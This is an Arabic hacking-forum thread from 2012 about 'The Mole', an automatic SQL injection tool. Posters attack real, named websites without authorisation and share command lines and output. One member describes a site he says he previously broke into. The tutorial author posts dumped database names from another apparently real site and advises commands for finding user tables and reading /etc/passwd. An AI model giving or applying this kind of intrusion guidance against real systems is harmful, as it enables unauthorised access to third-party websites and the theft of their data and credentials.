:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :) (http://www.vbspiders.com/vb/t64306.html)

PM2CL 08-17-2012 06:33 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
لدي موق أخترقته ب sql صابقا والثغرة شغالة
لاكن عندما أجرب الاداة لاتشتغل

C:\themole-0.2.6>mole.exe -u http://apos.co.in/bulletindisplay.php?bulletin=5 -n
'shcemas'
_____ _ ___ ___ _
|_ _| | | \/ | | |
| | | |__ ___ | . . | ___ | | ___
| | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
| | | | | | __/ | | | | (_) | | __/
\_/ |_| |_|\___| \_| |_/\___/|_|\___|

Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!

#> needle schemas
#> schemas
[-] Could not detect SQL Injection: Needle not found (Needle not in page)
#>

GHOST HACKERS 08-17-2012 06:49 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
موفق اخي ..............

Q2-ksa 08-17-2012 06:18 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
اقتباس:

المشاركة الأصلية كتبت بواسطة PM2CL (المشاركة 445894)
لدي موق أخترقته ب sql صابقا والثغرة شغالة
لاكن عندما أجرب الاداة لاتشتغل

C:\themole-0.2.6>mole.exe -u http://apos.co.in/bulletindisplay.php?bulletin=5 -n
'shcemas'
_____ _ ___ ___ _
|_ _| | | \/ | | |
| | | |__ ___ | . . | ___ | | ___
| | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
| | | | | | __/ | | | | (_) | | __/
\_/ |_| |_|\___| \_| |_/\___/|_|\___|

Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!

#> needle schemas
#> schemas
[-] Could not detect SQL Injection: Needle not found (Needle not in page)
#>



اهلاً ياصديقي .. :)
ليش انت زعلان :)

تفضل هذه صورة للحقن تبع موقعك ..

المره الاخرى عط الامر
needle user
schemas user


http://im20.gulfup.com/2012-08-17/134521491061.jpg






http://im27.gulfup.com/2012-08-17/1345215098941.jpg

Q2-ksa 08-17-2012 06:24 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
لا احد يجي يقول الأداه ما أشتغلت ..
عطوا الأوامر اللي انا عطيتها في الشرح مبدأياً ..
واذا واجهتوا مشكلة عطوا الاوامر اللي انا شرحتها للأعضاء اللي واجهوا مشكلة..



موفقين خير باذن الله ..

ViRuS Qalaa 08-17-2012 08:47 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
تسلم حبيبي ع الشرح الرائع
بارك الله فيك ..,

الشيطانو 08-19-2012 04:30 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
لم اسمع في حياتي بهده الاداة جاري التجربة
وبارك الله فيك

محمد50 08-19-2012 09:02 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
اقتباس:

اهلاً يامحمد ..
الحلو وجودك ..
عندما تريد استهداف موقع .. سـ تلجأ لعدة طرق .. لكن الهدف واحد ..الهدف هو الاختراق ..
وثغرات الـ sql تجدي نفعاً مع الاستهداف ..
و الاختراق العشوائي ممتع لمن يريدون ممارسة الاختراق بشكل عام .. او عمل بعض الشروحات على الشل او على تخطيات الحماية او ع اي هدف قائم لاجل الاختراق ..

بالنسبة لكلامك (عن الانظمة الاخرى) ..
المسألة مسألة خبرة .. وممارسة..
نظام الويندوز في يد (المبرمج) افضل من اللينكس في يد (متوسط الخبرة)..
وعلى فكرة .. الاداة التي قمت بشرحها تعمل على (لينكس وماك وويندوز) ..
ولا يوجد في الانترنت شرح فيديو واضح مثل ماشرحت انا .. الا شرح واحد من الشركة المصنعه للاداة وشرح غير واضح..
فـ نظراً لكثرة طلبات شرح الاداة في عدة مواقع قمت بـ عمل هذا الشرح..
ولم انزل هذا الموضوع الا هنا وفي منتدى صديق لي ..

تمنياتي للجميع بالتوفيق ..
---------------------------------------------------------------------------------------------------------
نابئن ان انت لك خبره بي الانضمه
مثل الانضمه الينونكس ولينكس واتروان
ليش ما تبحث عن الانضمه الاخر
او هل تعرف الاشخاص الهكر والكراكرز ولتنكس و.......
كل هاذ الشغلالات لقد تم اعتزلي لان حدث لي مشكل في شبكه العنكبوت
وانا واعود بي كلمت انا ((انا كنت لو تعرفوا بي موقع اسمه )) ((( قرصنة العرب))) الرابط الموقع هاذ
(( http://www.xp10.com))
انا كنت القيدي لي حملات مثل المبليوست
او جهد العرب
او يا من ملحدين الاسلام
او
او ............
لكن خلي نحن بي
الوقعه
نحن اشخص سريون لي الغيه ونحن ما تنكلامي بي اشياء اكتشفها
لكن نحن نعطف على المحتجين لي العلم وعلى ما قال
العلم نور والجهل ضلام وانا عرف ان انت اكتشفت الادره وركبتهاء على النودوز ام من نحيه لي الينكس ممكن انت دمجت الاده معاء النضام الباك تراك
ام انت علمت اتصال بين النضم الاصلي والنضم الوهمي علمت اتثصال vip ممكن
وعلى العموم انا
ما قلت شي لكن انا حبيت ان اقوم بي اطرح رئي لي الموضوع ولي صحب الموضوع
ام اذ انا ازعجتك بي شي انا اسف لو انت تبغاء ان عدم المشركت جميع الموضيعك انا جهز لي ان ما اشارك بي جميع الموضيعك
اوكيه يا الاخ الكريم يا
اقتباس:

Q2-ksa
وعلى ما اضن ان انا كثرت بي الكلام حق انا
اسف اسف اسف
وعلى العموم
.................................................. .................................................. .........................................
.................................................ك ل عام وانتم بخير .................................................. ..................
............................................بااااا اااااااااااااااااااي .................................................. ..................
.................................................ت حاتي كان معكم .................................................. ...................
.................................................. ......محمد50 .................................................. ...................
............................................بااااا ااااااااااااااااااااااااااي .................................................. ......

Q2-ksa 08-20-2012 02:02 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
اقتباس:

المشاركة الأصلية كتبت بواسطة الشيطانو (المشاركة 446076)
لم اسمع في حياتي بهده الاداة جاري التجربة
وبارك الله فيك


اهلاً اخوي شيطانو ..
كما هو المعروف ان ادوات البايثون قليل من يقومون بشرحها..
فلن تجد اي شخص غيري شرح هذه الأداة بهذه الطريقة مع التطبيق ومع ذكر ربط الأوامر مع بعض لإظهار نتيجة جيده..مع ان الشركة لم تذكر هذه الاوامر بهذه الطريقة وهذا الربط..ومافيه منتدى سواءً عربي او اجنبي قام بوضع هذه الأوامر ..:icon30:
لكن لعيونكم كل شي (يصير) :blush-anim-cl:

نسيت أن أضع لكم نقطة مهمّة في حال لم تخرجوا بنتيجة من الأوامر التي وضعتها لكم ..
عندما تحدد الـ needle سواءً بـ هذه الطريقة :
needle admin
needle user
needle schemas
needle schema
needle mysql
ولم تخرج بنتيجة .. قم نسخ الدومين الخاص بالموقع المصاب ..
نفرض مثلاً هذا هو الموقع
http://abc123.com
نقوم بكتابة
needle abc123
ونعطي بعدها امر الـ schemas

وان شاء الله تطلعون بنتيجة نفس ماطلع معي هنا:

اقتباس:

#> needle prestonathletics
#> schemas
[i] Trying injection using 0 parenthesis.
[+] Found separator: " "
[+] Found DBMS: Mysql
[+] Found comment delimiter: "#"
[+] Query columns count: 8
[+] Injectable fields found: [1, 3, 4, 5, 7]
[+] Found injectable field: 1
[+] Using string union technique.
[+] Rows: 2
+--------------------+
| Databases |
+--------------------+
| information_schema |
| prestona_oaidb |
+--------------------+

Q2-ksa 08-20-2012 02:21 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 


تقدرون برضو تعطون هذا الأمر:
find_users_table mysql
للبحث عن جداول اليوزر تبع القاعدة..

على فكرة .. الاداة تطلّع databeas اللي ماتطلّعها اداة الهافيج..
يعني ( الاداة قوّية )..
ولو أعطينا الأمر هذا:
dbinfo
راح يبين لك معلومات.
لو مثلاً صارت معك بهذه الطريقة :
root@localhost

وقتها بأمكانكم تستخدمون أمر :

readfile /etc/passwd

:)


sni!ip3r 08-20-2012 01:11 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
شرح لايـ على عليه
ولااول مرهـ اشوفه

استحملنا شوي اخوي
Mole not ready: Attribute url and vulnerable param are required

مآافهمت وش مقصدهـ من هالعبآارهـ ؟

وهنآء مشكله ثانيه بـ موقع ثآاني

#> needle user
#> schemas user
[i] Trying injection using 0 parenthesis.
[i] Trying injection using 1 parenthesis.
[i] Trying separator: ( )

منتظرك ع احر من الجمر .. الاداه جبتها بوقتها الله يطيك العآافيه

دحمان39 08-27-2012 04:09 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
بارك الله فيك يابطل

المفترس 08-27-2012 06:57 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
ما اشتغلت معاي صارلي متل الاخ PM2CL
طبقت ما شرحته في الردود التي تليه ولكن ولا نتيجة

المهم انا من عشاق الحقن اليدوي
كنت حاب اخد فكرة عليها فقط

Dr..ViRuS 10-17-2012 02:17 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
يعطيك العافيه ياريت لو كنت شرحت شرح فيديو كان احسن

خالد سعودي 10-17-2012 03:12 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
اداء جميلة تفيد النظام التشغيل ويندوز كثير ولكن هل الاداء تخطى الفلتر
وشكرا على الشرح

moon2 11-10-2012 06:37 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)
 
بارك الله فيك اخي العزيز

تحياتي


الساعة الآن 06:56 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0